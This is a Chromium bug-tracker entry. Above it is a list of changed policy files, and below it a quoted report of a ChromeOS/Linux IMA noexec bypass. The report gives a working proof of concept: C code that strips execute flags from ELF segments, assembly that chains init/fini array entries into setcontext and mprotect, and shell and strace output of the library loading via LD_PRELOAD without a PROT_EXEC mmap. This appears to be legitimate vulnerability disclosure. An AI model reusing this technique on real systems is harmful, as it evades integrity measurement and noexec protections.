[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/amd64/pixtpfwup.update.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/stupdate/policies/amd64/stupdate.update.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/etphidiap/policies/amd64/etphidiap.query.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/arm/gdixupdate.update.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/amd64/mfsupdate.query.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/arm64/wacom_flash.update.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/amd64/elani2chid.update.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/amd64/wacom_flash.update.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/amd64/zinitixupdate.query.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/arm/wdt_util.query.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/arm/wdt_util.update.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/amd64/g2touch.update.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/arm/gdixupdate.query.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/arm/elani2chid.query.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/arm/wacom_flash.update.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/amd64/wdt_util.query.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/stupdate/policies/amd64/stupdate.query.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/amd64/eps2pstiap.query.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/amd64/zinitixupdate.update.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/amd64/sisupdate.update.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/arm/pixtpfwup.update.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/arm/g2touch.update.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/amd64/g2touch.query.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/amd64/pixtpfwup.query.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/amd64/emrightupdate.query.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/arm/rmi4update.query.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/arm64/rmi4update.query.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/arm64/g2touch.query.policy
[modify]https://crrev.com/3d54d863f2e8c003d198c01dad1d4453d3d867a9/policies/arm/rmi4update.update.policy
is...@google.com <is...@google.com> #82
This issue was migrated from crbug.com/chromium/1182687?no_tracker_redirect=1
[Monorail components added to Component Tags custom field.]
Description
This is marked as Severity-High because a noexec bypass would be exactly that, but currently labelled a P2 because we haven't fully confirmed that it works on CrOS.
"""
At least in the Debian Stretch VM I'm testing with, even dynamic ELF
libraries can be crafted such that they can be loaded without tripping
the security hook that listens for mmap() with PROT_EXEC because
glibc's dynamic loader allows you to load a library that has no
executable segments; a demo for this follows below. It feels like this
probably violates IMA's design goals, but I'm not sure.
=============================
user@debian:~/ima_stuff$ cat make_segments_rw.c
#include <stdlib.h>
#include <fcntl.h>
#include <err.h>
#include <elf.h>
#include <sys/mman.h>
#include <sys/stat.h>

int main(int argc, char **argv) {
  int fd = open(argv[1], O_RDWR);
  if (fd == -1) err(1, "open");
  struct stat st;
  if (fstat(fd, &st)) err(1, "stat");
  unsigned char *mapping = mmap(NULL, st.st_size,
                                PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
  if (mapping == MAP_FAILED) err(1, "mmap");
  Elf64_Ehdr *ehdr = (void*)mapping;
  Elf64_Phdr *phdrs = (void*)(mapping + ehdr->e_phoff);
  for (int i=0; i<ehdr->e_phnum; i++) {
    phdrs[i].p_flags &= ~PF_X;
    phdrs[i].p_flags |= PF_W;
  }
  return 0;
}
user@debian:~/ima_stuff$ cat test.s
.text
.section .text.startup,"aw",@progbits
.globl foobar
.align 4096
foobar:
/* alignment for xmm stuff in libc */
sub $8, %rsp
call getpid
mov %rax, %rsi
leaq message(%rip), %rdi
call printf
movq stdout_indir(%rip), %rdi
movq (%rdi), %rdi
call fflush
xor %edi, %edi
call _exit
.section .init_array,"aw"
.align 8
.quad rmdir+0x774
.section .fini_array,"aw"
.quad 0xdeadbeef
.quad 0xdeadbeef
.quad 0xdeadbeef
.quad ucontext_data /* goes into rdi */
.quad 0xdeadbeef
.quad 0xdeadbeef
.quad 0xdeadbeef
.quad 0xdeadbeef
.quad setcontext+0x35 /* call target */
.data
ucontext_data:
/* 0x00 */
.quad 0xdeadbeefdeadbeef, 0xdeadbeefdeadbeef
.quad 0xdeadbeefdeadbeef, 0xdeadbeefdeadbeef
.quad 0xdeadbeefdeadbeef, 0xdeadbeefdeadbeef
.quad 0xdeadbeefdeadbeef, 0xdeadbeefdeadbeef
/* 0x40 */
.quad 0xdeadbeefdeadbeef, 0xdeadbeefdeadbeef
.quad 0xdeadbeefdeadbeef, 0xdeadbeefdeadbeef
.quad 0xdeadbeefdeadbeef, foobar
.quad 0x1000, 0xdeadbeefdeadbeef
/* 0x80 */
.quad 0xdeadbeefdeadbeef, 0x7
.quad 0xdeadbeefdeadbeef, 0xdeadbeefdeadbeef
.quad stack_end, mprotect
/* my stack */
.fill 0x10000, 1, 0x42
stack_end:
.quad foobar
message:
.string "hello world from PID %d\n"
stdout_indir:
.quad stdout
user@debian:~/ima_stuff$ gcc -o make_segments_rw make_segments_rw.c
user@debian:~/ima_stuff$ as -o test.o test.s
test.s: Assembler messages:
test.s:2: Warning: setting incorrect section attributes for .text.startup
user@debian:~/ima_stuff$ ld -shared -znorelro -o test.so test.o
user@debian:~/ima_stuff$ ./make_segments_rw test.so
user@debian:~/ima_stuff$ LD_PRELOAD=./test.so /bin/echo
hello world from PID 1053
user@debian:~/ima_stuff$ sudo tail
/sys/kernel/security/ima/runtime_measurements_count
1182
user@debian:~/ima_stuff$ sudo tail /sys/kernel/security/ima/runtime_measurements
tail: cannot open '/sys/kernel/security/ima/runtime_measurements' for
reading: No such file or directory
user@debian:~/ima_stuff$ sudo tail
/sys/kernel/security/ima/ascii_runtime_measurements
10 2435d24127ce5bcfbe776589ac86bc85530da07d ima-ng
sha256:ae35ddf5dbbef6ea31e8b87326001d12a6b4ec479bb8195b874d733d69ed1a4d
/usr/bin/x86_64-linux-gnu-gcc-6
10 f3ed20073a77fbc020d2807ce12ffc4cdbced976 ima-ng
sha256:65af5a9ea7ce00be9b921d4b13f5224c2369451eb918d4fa7721442283545957
/usr/bin/x86_64-linux-gnu-g++-6
10 25f0128e89a730a6f1cdd42d8de71d3db2625c9e ima-ng
sha256:d5d7e609b95939d0ae9f75a953d5cda4f1d8b9e4c1db98aeee7f792028bf026e
/usr/bin/x86_64-linux-gnu-as
10 51cf269a0008ab8173c7a696bee11be86a0bbd45 ima-ng
sha256:2d10a4e221ef8454b635f1ec646e6f4ff7f3db8e2e59b489c642758b2624a659
/usr/lib/x86_64-linux-gnu/
10 b5c1db60c50722e1af84b83b34c0adb04b98d040 ima-ng
sha256:d3eef29b5b5bfc12999c5dbcc91029302477b70c7599aeb6b564140a336ab00b
/usr/lib/x86_64-linux-gnu/
10 6364d50cdac1733b7fd5dcfd9df124d1e4362a12 ima-ng
sha256:30c26e4b3cbd0677b2a23d09a72989002af138be57d301ed529c91b88427098f
/usr/lib/gcc/x86_64-linux-gnu/6/collect2
10 2a8c7ddacee57967e8a00ee1a522b552e29f559f ima-ng
sha256:a7b6287a8095701713e9ee7a886cae1f1ceefd0ce9c45dcc38719af563200964
/usr/bin/x86_64-linux-gnu-ld.bfd
10 e55a9c15349e2271cbdfe2f4fe36cd5b4070d3d0 ima-ng
sha256:b31674ad141a40eb2603f20400cc0dea4ee32ecf87771df3d039f16aae60ee26
/usr/lib/gcc/x86_64-linux-gnu/6/liblto_plugin.so.0.0.0
10 617aab630be74cd5bb7d830a727fd29cda361743 ima-ng
sha256:40fbf6acd3182d7a1ad158cd4de48da704bfe84f468d7b58dd557db93fe8a34c
/usr/bin/vim.basic
10 2c1fe398ecc0a8db6651621715d60a7e1b1958dc ima-ng
sha256:8523b422a01af773eff76b981c763cf0c739ea3030e592bb4d4f7854e295c418
/home/user/ima_stuff/make_segments_rw
user@debian:~/ima_stuff$
=============================
When looking at the syscalls the process is making, you can see that
it indeed never calls mmap() with PROT_EXEC on the library (my
shellcode does mprotect() the code to be executable, but IMA doesn't
use the mprotect security hook):
=============================
user@debian:~/ima_stuff$ strace -E LD_PRELOAD=./test.so /bin/echo
execve("/bin/echo", ["/bin/echo"], [/* 44 vars */]) = 0
brk(NULL) = 0x5642c52bc000
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
mmap(NULL, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1,
0) = 0x7fb83e817000
open("./test.so", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\0\20\0\0\0\0\0\0"...,
832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=72232, ...}) = 0
getcwd("/home/user/ima_stuff", 128) = 21
mmap(NULL, 2167449, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_DENYWRITE,
3, 0) = 0x7fb83e3e5000
mprotect(0x7fb83e3e7000, 2093056, PROT_NONE) = 0
mmap(0x7fb83e5e6000, 69632, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1000) = 0x7fb83e5e6000
mprotect(0x7ffea1b1f000, 4096,
PROT_READ|PROT_WRITE|PROT_EXEC|PROT_GROWSDOWN) = 0
close(3) = 0
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=103509, ...}) = 0
mmap(NULL, 103509, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fb83e7fd000
close(3) = 0
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\320\3\2\0\0\0\0\0"...,
832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=1689360, ...}) = 0
mmap(NULL, 3795360, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3,
0) = 0x7fb83e046000
mprotect(0x7fb83e1db000, 2097152, PROT_NONE) = 0
mmap(0x7fb83e3db000, 24576, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x195000) = 0x7fb83e3db000
mmap(0x7fb83e3e1000, 14752, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7fb83e3e1000
close(3) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1,
0) = 0x7fb83e7fb000
arch_prctl(ARCH_SET_FS, 0x7fb83e7fb700) = 0
mprotect(0x7fb83e3db000, 16384, PROT_READ) = 0
mprotect(0x5642c3eed000, 4096, PROT_READ) = 0
mprotect(0x7fb83e81a000, 4096, PROT_READ) = 0
munmap(0x7fb83e7fd000, 103509) = 0
mprotect(0x7fb83e3e6000, 4096, PROT_READ|PROT_WRITE|PROT_EXEC) = 0
getpid() = 1084
fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 4), ...}) = 0
brk(NULL) = 0x5642c52bc000
brk(0x5642c52dd000) = 0x5642c52dd000
write(1, "hello world from PID 1084\n", 26hello world from PID 1084
) = 26
exit_group(0) = ?
+++ exited with 0 +++
=============================
"""